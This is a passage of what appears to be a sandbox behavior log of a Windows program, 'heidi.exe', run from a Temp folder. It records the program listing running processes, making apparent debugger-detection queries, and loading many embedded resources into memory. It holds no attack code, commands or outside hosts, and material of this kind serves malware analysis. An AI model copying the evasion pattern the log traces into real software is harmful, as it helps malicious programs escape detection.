lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="libraries-marked-stockholm.exe")) returned 1 [0133.207] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trains.exe")) returned 1 [0133.207] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shipmentspeakerscholarships.exe")) returned 1 [0133.207] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="login.exe")) returned 1 [0133.208] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sodiumrevealstent.exe")) returned 1 [0133.208] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="percentagelowest.exe")) returned 1 [0133.208] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="budget sec ampland topics.exe")) returned 1 [0133.209] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="boot-common-dense.exe")) returned 1 [0133.209] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="buys_interstate_particles.exe")) returned 1 [0133.209] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="diesel-lately-cause-way.exe")) returned 1 [0133.210] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bearing_triple_distributed.exe")) returned 1 [0133.210] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="howardloctemperature.exe")) returned 1 [0133.210] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobile-nomination-humanities.exe")) returned 1 [0133.211] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referring_presents_record.exe")) returned 1 [0133.211] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.211] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.212] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0133.212] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.212] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.213] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x930, pcPriClassBase=8, dwFlags=0x0, szExeFile="heidi.exe")) returned 1 [0133.213] Process32NextW (in: hSnapshot=0xd4, lppe=0x18f834 | out: lppe=0x18f834*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x930, pcPriClassBase=8, dwFlags=0x0, szExeFile="heidi.exe")) returned 0 [0133.214] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f80c, nSize=0x104 | out: lpFilename="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe")) returned 0x2e [0133.214] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18fa5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18fa5c, ReturnLength=0x0) returned 0x0 [0133.214] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18fa58, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18fa58, ReturnLength=0x0) returned 0xc0000353 [0133.214] GetCommandLineW () returned="\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" " [0133.214] CallWindowProcW (lpPrevWndFunc=0x260004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x299640 [0133.214] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" ", pNumArgs=0x18fa5c | out: pNumArgs=0x18fa5c) returned 0x299640*="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" [0133.214] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.214] FindResourceW (hModule=0x400000, lpName="PACKAGEINFO", lpType=0xa) returned 0x4934b0 [0133.214] SizeofResource (hModule=0x400000, hResInfo=0x4934b0) returned 0xee [0133.214] LoadResource (hModule=0x400000, hResInfo=0x4934b0) returned 0x4b77e8 [0133.214] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x270000 [0133.215] VirtualAlloc (lpAddress=0x0, dwSize=0x3c1e0, flAllocationType=0x3000, flProtect=0x4) returned 0x670000 [0133.215] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.215] FindResourceW (hModule=0x400000, lpName=0x3e9, lpType=0x7) returned 0x4911c0 [0133.215] SizeofResource (hModule=0x400000, hResInfo=0x4911c0) returned 0xdc [0133.215] LoadResource (hModule=0x400000, hResInfo=0x4911c0) returned 0x499850 [0133.215] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.216] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.216] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.216] FindResourceW (hModule=0x400000, lpName=0x3ea, lpType=0x7) returned 0x4911d0 [0133.216] SizeofResource (hModule=0x400000, hResInfo=0x4911d0) returned 0xdc [0133.216] LoadResource (hModule=0x400000, hResInfo=0x4911d0) returned 0x49992c [0133.216] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.216] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.216] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.216] FindResourceW (hModule=0x400000, lpName=0x3eb, lpType=0x7) returned 0x4911e0 [0133.216] SizeofResource (hModule=0x400000, hResInfo=0x4911e0) returned 0xdc [0133.216] LoadResource (hModule=0x400000, hResInfo=0x4911e0) returned 0x499a08 [0133.216] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.217] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.217] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.217] FindResourceW (hModule=0x400000, lpName=0x3ec, lpType=0x7) returned 0x4911f0 [0133.217] SizeofResource (hModule=0x400000, hResInfo=0x4911f0) returned 0xdc [0133.217] LoadResource (hModule=0x400000, hResInfo=0x4911f0) returned 0x499ae4 [0133.217] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.217] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.218] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.218] FindResourceW (hModule=0x400000, lpName=0x3ed, lpType=0x7) returned 0x491200 [0133.218] SizeofResource (hModule=0x400000, hResInfo=0x491200) returned 0xdc [0133.218] LoadResource (hModule=0x400000, hResInfo=0x491200) returned 0x499bc0 [0133.218] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.218] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.218] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.218] FindResourceW (hModule=0x400000, lpName=0x3ee, lpType=0x7) returned 0x491210 [0133.218] SizeofResource (hModule=0x400000, hResInfo=0x491210) returned 0xdc [0133.218] LoadResource (hModule=0x400000, hResInfo=0x491210) returned 0x499c9c [0133.218] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.219] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.219] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.219] FindResourceW (hModule=0x400000, lpName=0x3ef, lpType=0x7) returned 0x491220 [0133.219] SizeofResource (hModule=0x400000, hResInfo=0x491220) returned 0xdc [0133.219] LoadResource (hModule=0x400000, hResInfo=0x491220) returned 0x499d78 [0133.219] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.219] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.219] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.219] FindResourceW (hModule=0x400000, lpName=0x3f0, lpType=0x7) returned 0x491230 [0133.219] SizeofResource (hModule=0x400000, hResInfo=0x491230) returned 0xdc [0133.220] LoadResource (hModule=0x400000, hResInfo=0x491230) returned 0x499e54 [0133.220] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.220] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.220] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.220] FindResourceW (hModule=0x400000, lpName=0x3f1, lpType=0x7) returned 0x491240 [0133.220] SizeofResource (hModule=0x400000, hResInfo=0x491240) returned 0xdc [0133.220] LoadResource (hModule=0x400000, hResInfo=0x491240) returned 0x499f30 [0133.220] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.221] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.221] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.221] FindResourceW (hModule=0x400000, lpName=0x3f2, lpType=0x7) returned 0x491250 [0133.221] SizeofResource (hModule=0x400000, hResInfo=0x491250) returned 0xdc [0133.221] LoadResource (hModule=0x400000, hResInfo=0x491250) returned 0x49a00c [0133.221] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.221] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.221] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.221] FindResourceW (hModule=0x400000, lpName=0x3f3, lpType=0x7) returned 0x491260 [0133.221] SizeofResource (hModule=0x400000, hResInfo=0x491260) returned 0xdc [0133.221] LoadResource (hModule=0x400000, hResInfo=0x491260) returned 0x49a0e8 [0133.221] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.222] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.222] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.222] FindResourceW (hModule=0x400000, lpName=0x3f4, lpType=0x7) returned 0x491270 [0133.222] SizeofResource (hModule=0x400000, hResInfo=0x491270) returned 0xdc [0133.222] LoadResource (hModule=0x400000, hResInfo=0x491270) returned 0x49a1c4 [0133.222] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.222] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.223] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.223] FindResourceW (hModule=0x400000, lpName=0x3f5, lpType=0x7) returned 0x491280 [0133.223] SizeofResource (hModule=0x400000, hResInfo=0x491280) returned 0xdc [0133.223] LoadResource (hModule=0x400000, hResInfo=0x491280) returned 0x49a2a0 [0133.223] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.223] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.223] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.223] FindResourceW (hModule=0x400000, lpName=0x3f6, lpType=0x7) returned 0x491290 [0133.223] SizeofResource (hModule=0x400000, hResInfo=0x491290) returned 0xdc [0133.223] LoadResource (hModule=0x400000, hResInfo=0x491290) returned 0x49a37c [0133.223] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.224] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.224] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.224] FindResourceW (hModule=0x400000, lpName=0x3f7, lpType=0x7) returned 0x4912a0 [0133.224] SizeofResource (hModule=0x400000, hResInfo=0x4912a0) returned 0xdc [0133.224] LoadResource (hModule=0x400000, hResInfo=0x4912a0) returned 0x49a458 [0133.224] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.224] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.225] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.225] FindResourceW (hModule=0x400000, lpName=0x3f8, lpType=0x7) returned 0x4912b0 [0133.225] SizeofResource (hModule=0x400000, hResInfo=0x4912b0) returned 0xdc [0133.225] LoadResource (hModule=0x400000, hResInfo=0x4912b0) returned 0x49a534 [0133.225] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.225] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.225] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.225] FindResourceW (hModule=0x400000, lpName=0x3f9, lpType=0x7) returned 0x4912c0 [0133.225] SizeofResource (hModule=0x400000, hResInfo=0x4912c0) returned 0xdc [0133.225] LoadResource (hModule=0x400000, hResInfo=0x4912c0) returned 0x49a610 [0133.225] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.226] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.226] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.226] FindResourceW (hModule=0x400000, lpName=0x3fa, lpType=0x7) returned 0x4912d0 [0133.226] SizeofResource (hModule=0x400000, hResInfo=0x4912d0) returned 0xdc [0133.226] LoadResource (hModule=0x400000, hResInfo=0x4912d0) returned 0x49a6ec [0133.226] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.226] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.226] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.226] FindResourceW (hModule=0x400000, lpName=0x3fb, lpType=0x7) returned 0x4912e0 [0133.226] SizeofResource (hModule=0x400000, hResInfo=0x4912e0) returned 0xdc [0133.226] LoadResource (hModule=0x400000, hResInfo=0x4912e0) returned 0x49a7c8 [0133.226] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.227] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.227] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.227] FindResourceW (hModule=0x400000, lpName=0x3fc, lpType=0x7) returned 0x4912f0 [0133.227] SizeofResource (hModule=0x400000, hResInfo=0x4912f0) returned 0xdc [0133.227] LoadResource (hModule=0x400000, hResInfo=0x4912f0) returned 0x49a8a4 [0133.227] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.227] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.228] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.228] FindResourceW (hModule=0x400000, lpName=0x3fd, lpType=0x7) returned 0x491300 [0133.228] SizeofResource (hModule=0x400000, hResInfo=0x491300) returned 0xdc [0133.228] LoadResource (hModule=0x400000, hResInfo=0x491300) returned 0x49a980 [0133.228] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.228] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.228] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.228] FindResourceW (hModule=0x400000, lpName=0x3fe, lpType=0x7) returned 0x491310 [0133.228] SizeofResource (hModule=0x400000, hResInfo=0x491310) returned 0xdc [0133.228] LoadResource (hModule=0x400000, hResInfo=0x491310) returned 0x49aa5c [0133.228] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.229] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.229] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.229] FindResourceW (hModule=0x400000, lpName=0x3ff, lpType=0x7) returned 0x491320 [0133.229] SizeofResource (hModule=0x400000, hResInfo=0x491320) returned 0xdc [0133.229] LoadResource (hModule=0x400000, hResInfo=0x491320) returned 0x49ab38 [0133.229] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.229] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.229] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.229] FindResourceW (hModule=0x400000, lpName=0x400, lpType=0x7) returned 0x491330 [0133.229] SizeofResource (hModule=0x400000, hResInfo=0x491330) returned 0xdc [0133.230] LoadResource (hModule=0x400000, hResInfo=0x491330) returned 0x49ac14 [0133.230] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.232] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.232] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.232] FindResourceW (hModule=0x400000, lpName=0x401, lpType=0x7) returned 0x491340 [0133.232] SizeofResource (hModule=0x400000, hResInfo=0x491340) returned 0xdc [0133.232] LoadResource (hModule=0x400000, hResInfo=0x491340) returned 0x49acf0 [0133.232] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.232] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.233] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.233] FindResourceW (hModule=0x400000, lpName=0x402, lpType=0x7) returned 0x491350 [0133.233] SizeofResource (hModule=0x400000, hResInfo=0x491350) returned 0xdc [0133.233] LoadResource (hModule=0x400000, hResInfo=0x491350) returned 0x49adcc [0133.233] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.233] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.233] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.233] FindResourceW (hModule=0x400000, lpName=0x403, lpType=0x7) returned 0x491360 [0133.233] SizeofResource (hModule=0x400000, hResInfo=0x491360) returned 0xdc [0133.233] LoadResource (hModule=0x400000, hResInfo=0x491360) returned 0x49aea8 [0133.233] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.234] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.234] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.234] FindResourceW (hModule=0x400000, lpName=0x404, lpType=0x7) returned 0x491370 [0133.234] SizeofResource (hModule=0x400000, hResInfo=0x491370) returned 0xdc [0133.234] LoadResource (hModule=0x400000, hResInfo=0x491370) returned 0x49af84 [0133.234] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.234] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.234] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.234] FindResourceW (hModule=0x400000, lpName=0x405, lpType=0x7) returned 0x491380 [0133.234] SizeofResource (hModule=0x400000, hResInfo=0x491380) returned 0xdc [0133.234] LoadResource (hModule=0x400000, hResInfo=0x491380) returned 0x49b060 [0133.234] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.235] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.235] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.235] FindResourceW (hModule=0x400000, lpName=0x406, lpType=0x7) returned 0x491390 [0133.235] SizeofResource (hModule=0x400000, hResInfo=0x491390) returned 0xdc [0133.235] LoadResource (hModule=0x400000, hResInfo=0x491390) returned 0x49b13c [0133.235] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.235] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.236] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.236] FindResourceW (hModule=0x400000, lpName=0x407, lpType=0x7) returned 0x4913a0 [0133.236] SizeofResource (hModule=0x400000, hResInfo=0x4913a0) returned 0xdc [0133.236] LoadResource (hModule=0x400000, hResInfo=0x4913a0) returned 0x49b218 [0133.236] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.236] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.236] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.236] FindResourceW (hModule=0x400000, lpName=0x408, lpType=0x7) returned 0x4913b0 [0133.236] SizeofResource (hModule=0x400000, hResInfo=0x4913b0) returned 0xdc [0133.236] LoadResource (hModule=0x400000, hResInfo=0x4913b0) returned 0x49b2f4 [0133.237] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.237] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.237] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.237] FindResourceW (hModule=0x400000, lpName=0x409, lpType=0x7) returned 0x4913c0 [0133.237] SizeofResource (hModule=0x400000, hResInfo=0x4913c0) returned 0xdc [0133.237] LoadResource (hModule=0x400000, hResInfo=0x4913c0) returned 0x49b3d0 [0133.237] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.237] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.238] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.238] FindResourceW (hModule=0x400000, lpName=0x40a, lpType=0x7) returned 0x4913d0 [0133.238] SizeofResource (hModule=0x400000, hResInfo=0x4913d0) returned 0xdc [0133.238] LoadResource (hModule=0x400000, hResInfo=0x4913d0) returned 0x49b4ac [0133.238] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.238] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.238] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.238] FindResourceW (hModule=0x400000, lpName=0x40b, lpType=0x7) returned 0x4913e0 [0133.238] SizeofResource (hModule=0x400000, hResInfo=0x4913e0) returned 0xdc [0133.238] LoadResource (hModule=0x400000, hResInfo=0x4913e0) returned 0x49b588 [0133.238] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.239] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.239] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.239] FindResourceW (hModule=0x400000, lpName=0x40c, lpType=0x7) returned 0x4913f0 [0133.239] SizeofResource (hModule=0x400000, hResInfo=0x4913f0) returned 0xdc [0133.239] LoadResource (hModule=0x400000, hResInfo=0x4913f0) returned 0x49b664 [0133.239] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.239] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.239] GetModuleHandleA 